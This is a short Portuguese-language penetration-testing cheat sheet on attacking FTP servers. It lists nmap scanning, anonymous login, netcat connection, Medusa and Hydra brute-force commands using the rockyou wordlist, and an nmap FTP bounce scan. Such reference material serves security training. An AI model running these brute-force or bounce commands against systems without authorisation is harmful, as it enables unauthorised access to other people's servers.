FTP

O File Transfer Protocol ( FTP) é um protocolo de rede padrão usado para transferir arquivos entre computadores. Ele também executa operações de diretório e arquivos, como alterar o diretório de trabalho, listar arquivos e renomear e excluir diretórios ou arquivos. Por padrão, o FTP escuta na porta TCP/21.

Para atacar um servidor FTP, podemos abusar de configuração incorreta ou privilégios excessivos, explorar vulnerabilidades conhecidas ou descobrir novas vulnerabilidades.

Nmap

sudo nmap -sC -sV -p 21 <FQDN/IP>

Autenticação Anônima
anonymous : anonymous Autenticação via FTP

ftp <FQDN/IP>

Conectando ao servidor FTP usando netcat.

nc -v <FQDN/IP> 21

Força bruta com Medusa

medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h <FQDN/IP> -M ftp

Força bruta com Hydra

hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://<FQDN/IP>

FTP Bounce Attack

Um ataque de rejeição de FTP é um ataque de rede que usa servidores FTP para entregar tráfego de saída para outro dispositivo na rede.

nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2

PreviousAttacking Common Services NextSMB

Last updated 10 months ago